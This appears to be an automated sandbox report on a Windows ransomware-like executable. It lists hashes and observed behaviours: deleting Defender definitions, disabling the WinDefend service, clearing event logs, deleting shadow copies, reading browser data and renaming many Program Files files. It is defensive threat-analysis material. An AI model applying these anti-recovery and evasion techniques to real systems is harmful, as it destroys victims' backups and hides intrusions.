Resubmissions
13-01-2022 14:14  220113-rj8ymsagb4  10
13-01-2022 11:04  220113-m6crhahfgj  10
13-01-2022 10:58  220113-m3a4hahef9  10
Analysis
- max time kernel: 61s
- max time network: 156s
- platform: windows10_x64
- resource: win10-en-20211208
- submitted: 13-01-2022 11:04
Static task: static1
Behavioral task: behavioral1
  Sample: cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample: cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
  Resource: win10-en-20211208
General
- Target: cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
- Size: 2.5MB
- MD5: 8fdfa1997b566f6e086c29e33935dcc5
- SHA1: 178fbe1c8fc1a6e3440215d668797699f94a4bef
- SHA256: cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68
- SHA512: b185d1080c62f59ff26592321bf2a5cb85556260f34f59726cc9d5aeed1f82a48c710e8decd1212ddc2e4ca371ba83ad3aca6bf34587ddc73cc9c90afec467d5
Malware Config
Signatures
- Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
  Uses mpcmdrun utility to delete all AV definitions.
  Processes (pid, process):
    4292  MpCmdRun.exe
- Modifies security service (2 TTPs, 1 IoC)
  Processes (description, ioc, process):
    Set value (int)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"  reg.exe
- Clears Windows event logs (1 TTP)
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Drops file in Program Files directory (64 IoCs)
  Processes (description, ioc, process):
    File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\Access2019VL_MAK_AE-ul-oob.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_Ws6CBxLTbs40.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_SubTest-ul-oob.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_K2JruS0H3fQ0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-black_scale-80.png.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_8wKWajy-rrA0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookbig.gif.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_pNHacr3Xsbc0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_ja_4.4.0.v20140623020002.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_MlYmERBRnyk0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\invalid32x32.gif.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_eBD8aEEB7Mo0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Retail-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_PGeNiQcssP80.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\O365EduCloudEDUR_Subscription-ul-oob.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_yk7D3S0XPoY0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]_INqwEbPi3pc0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_Subscription-ul-oob.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_plkOpLyaTAg0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessVL_MAK-pl.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_SPDDfPCob7I0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Java\jdk1.8.0_66\THIRDPARTYLICENSEREADME.txt.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_PNuCQJ0fyls0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\cpyr.htm.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_4JdhLJLnDCU0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Orange.xml.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_MOwtg_uMcDs0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019R_Retail-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_kUnBnXJpnbY0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Common Files\System\msadc\en-US\msdaprsr.dll.mui  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-templates.xml.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_xX2PQ3br4KM0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-core.xml.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_SMl1u7JMklw0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\PublisherVL_MAK-pl.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_nSCftRHmmnc0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART12.BDR.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_cAPihrHLzl40.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]_r0TT6LtOwNw0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Common Files\microsoft shared\ink\ja-JP\FlickLearningWizard.exe.mui  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_zh_CN.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_RiSPKIEzKYU0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Trial-ul-oob.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_kXpOdpzuI7I0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_OEM_Perp-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_mEizp4cMadE0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_Retail-pl.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_cNKw_qf0ENs0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_1ArEvNlE2E80.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_RtBlita_xy80.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Trial-pl.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_CFi9eZpZqbw0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Common Files\microsoft shared\ink\en-US\boxed-split.avi  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-startup.xml.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_ACScJJ_f6ds0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\WordR_Grace-ul-oob.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_Dj_L17njakk0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Office16\1033\offsymsl.ttf.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_LGl3-uH_uiM0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.text.nl_ja_4.4.0.v20140623020002.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_4dEjXRrpuNQ0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-snaptracer.xml.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_I34Ak0ZbI-M0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Java\jdk1.8.0_66\jre\lib\flavormap.properties.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_DBeYSq6_32s0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_SubTest-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_rlQy0tLOI5o0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Retail-ul-phn.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_KHzEKTH6Mb40.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_zRMoBhpNd180.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.batik.util.gui_1.7.0.v200903091627.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_JmSdlk9ZeMI0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_ja.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_3yqDP-VjRNE0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-stil.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_YITotZ8vXPI0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Office16\MEDIA\CASHREG.WAV.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_icQ-Iw1fzpY0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Common Files\microsoft shared\ink\de-DE\rtscom.dll.mui  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs-nio2.xml.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_MF9ElsAtDMM0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Java\jre1.8.0_66\lib\plugin.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_-kFX3LjiTcg0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\ExcelVL_KMS_Client-ul.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_gDi1AfmKlow0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\NewComment.White@3x.png.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_8LtOLH_mnlk0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_xy8buR5xrsw0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\epl-v10.html.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_vdVp-Fhv3hc0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTest2-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_srYJQnnqZCQ0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp3-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_NSNFFUtZpMw0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\MicrosoftDataStreamerforExcel.dll.config.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_Zo6arwmkj4A0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-black_scale-140.png.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_x9Oejgf73eQ0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019VL_KMS_Client_AE-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_9zN3T-f8_8A0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Templates\1033\EssentialReport.dotx.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_32dn4WAdokM0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-text_zh_CN.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_NROijV3XKCk0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\PersonalPipcDemoR_BypassTrial365-ul-oob.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_eYiIJ7kf_YE0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_zh_CN.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_d_WaBF4u2rw0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_Grace-ppd.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_V5xJ9rhRmaY0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Common Files\System\msadc\ja-JP\msadcor.dll.mui  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Common Files\microsoft shared\MSInfo\ja-JP\msinfo32.exe.mui  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_ja_4.4.0.v20140623020002.jar.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_bc8croij8Do0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Retail-ul-phn.xrm-ms.Cmnj-SVq-oFv16bpjjzUQXiaVinB9WUAKbJkR3CNUVz_2CgErdBlaFM0.fmu9d  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
- Launches sc.exe
  Sc.exe is a Windows utility to control services on the system.
- Interacts with shadow copies (2 TTPs, 1 IoC)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes (pid, process):
    4976  vssadmin.exe
- Modifies registry class (3 IoCs)
  Processes (description, ioc, process):
    Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP  reg.exe
    Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP  reg.exe
    Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP  reg.exe
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (8 IoCs)
  Processes (pid, process):
    3268  powershell.exe
    3268  powershell.exe
    3268  powershell.exe
    2608  powershell.exe
    2608  powershell.exe
    2608  powershell.exe
    3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes (description, pid, process):
    Token: SeSecurityPrivilege  2828  wevtutil.exe
    Token: SeBackupPrivilege  2828  wevtutil.exe
    Token: SeSecurityPrivilege  3456  wevtutil.exe
    Token: SeBackupPrivilege  3456  wevtutil.exe
    Token: SeSecurityPrivilege  364  wevtutil.exe
    Token: SeBackupPrivilege  364  wevtutil.exe
    Token: SeIncreaseQuotaPrivilege  3408  wmic.exe
    Token: SeSecurityPrivilege  3408  wmic.exe
    Token: SeTakeOwnershipPrivilege  3408  wmic.exe
    Token: SeLoadDriverPrivilege  3408  wmic.exe
    Token: SeSystemProfilePrivilege  3408  wmic.exe
    Token: SeSystemtimePrivilege  3408  wmic.exe
    Token: SeProfSingleProcessPrivilege  3408  wmic.exe
    Token: SeIncBasePriorityPrivilege  3408  wmic.exe
    Token: SeCreatePagefilePrivilege  3408  wmic.exe
    Token: SeBackupPrivilege  3408  wmic.exe
    Token: SeRestorePrivilege  3408  wmic.exe
    Token: SeShutdownPrivilege  3408  wmic.exe
    Token: SeDebugPrivilege  3408  wmic.exe
    Token: SeSystemEnvironmentPrivilege  3408  wmic.exe
    Token: SeRemoteShutdownPrivilege  3408  wmic.exe
    Token: SeUndockPrivilege  3408  wmic.exe
    Token: SeManageVolumePrivilege  3408  wmic.exe
    Token: 33  3408  wmic.exe
    Token: 34  3408  wmic.exe
    Token: 35  3408  wmic.exe
    Token: 36  3408  wmic.exe
    Token: SeIncreaseQuotaPrivilege  816  wmic.exe
    Token: SeSecurityPrivilege  816  wmic.exe
    Token: SeTakeOwnershipPrivilege  816  wmic.exe
    Token: SeLoadDriverPrivilege  816  wmic.exe
    Token: SeSystemProfilePrivilege  816  wmic.exe
    Token: SeSystemtimePrivilege  816  wmic.exe
    Token: SeProfSingleProcessPrivilege  816  wmic.exe
    Token: SeIncBasePriorityPrivilege  816  wmic.exe
    Token: SeCreatePagefilePrivilege  816  wmic.exe
    Token: SeBackupPrivilege  816  wmic.exe
    Token: SeRestorePrivilege  816  wmic.exe
    Token: SeShutdownPrivilege  816  wmic.exe
    Token: SeDebugPrivilege  816  wmic.exe
    Token: SeSystemEnvironmentPrivilege  816  wmic.exe
    Token: SeRemoteShutdownPrivilege  816  wmic.exe
    Token: SeUndockPrivilege  816  wmic.exe
    Token: SeManageVolumePrivilege  816  wmic.exe
    Token: 33  816  wmic.exe
    Token: 34  816  wmic.exe
    Token: 35  816  wmic.exe
    Token: 36  816  wmic.exe
    Token: SeIncreaseQuotaPrivilege  816  wmic.exe
    Token: SeSecurityPrivilege  816  wmic.exe
    Token: SeTakeOwnershipPrivilege  816  wmic.exe
    Token: SeLoadDriverPrivilege  816  wmic.exe
    Token: SeSystemProfilePrivilege  816  wmic.exe
    Token: SeSystemtimePrivilege  816  wmic.exe
    Token: SeProfSingleProcessPrivilege  816  wmic.exe
    Token: SeIncBasePriorityPrivilege  816  wmic.exe
    Token: SeCreatePagefilePrivilege  816  wmic.exe
    Token: SeBackupPrivilege  816  wmic.exe
    Token: SeRestorePrivilege  816  wmic.exe
    Token: SeShutdownPrivilege  816  wmic.exe
    Token: SeDebugPrivilege  816  wmic.exe
    Token: SeSystemEnvironmentPrivilege  816  wmic.exe
    Token: SeRemoteShutdownPrivilege  816  wmic.exe
    Token: SeUndockPrivilege  816  wmic.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (description, pid, process, target process):
    PID 3328 wrote to memory of 3952  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  net.exe
    PID 3328 wrote to memory of 3952  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  net.exe
    PID 3328 wrote to memory of 3952  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  net.exe
    PID 3952 wrote to memory of 3456  3952  net.exe  net1.exe
    PID 3952 wrote to memory of 3456  3952  net.exe  net1.exe
    PID 3952 wrote to memory of 3456  3952  net.exe  net1.exe
    PID 3328 wrote to memory of 1984  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  net.exe
    PID 3328 wrote to memory of 1984  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  net.exe
    PID 3328 wrote to memory of 1984  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  net.exe
    PID 1984 wrote to memory of 1632  1984  net.exe  net1.exe
    PID 1984 wrote to memory of 1632  1984  net.exe  net1.exe
    PID 1984 wrote to memory of 1632  1984  net.exe  net1.exe
    PID 3328 wrote to memory of 64  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  net.exe
    PID 3328 wrote to memory of 64  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  net.exe
    PID 3328 wrote to memory of 64  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  net.exe
    PID 64 wrote to memory of 4196  64  net.exe  net1.exe
    PID 64 wrote to memory of 4196  64  net.exe  net1.exe
    PID 64 wrote to memory of 4196  64  net.exe  net1.exe
    PID 3328 wrote to memory of 4204  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  net.exe
    PID 3328 wrote to memory of 4204  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  net.exe
    PID 3328 wrote to memory of 4204  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  net.exe
    PID 4204 wrote to memory of 788  4204  net.exe  net1.exe
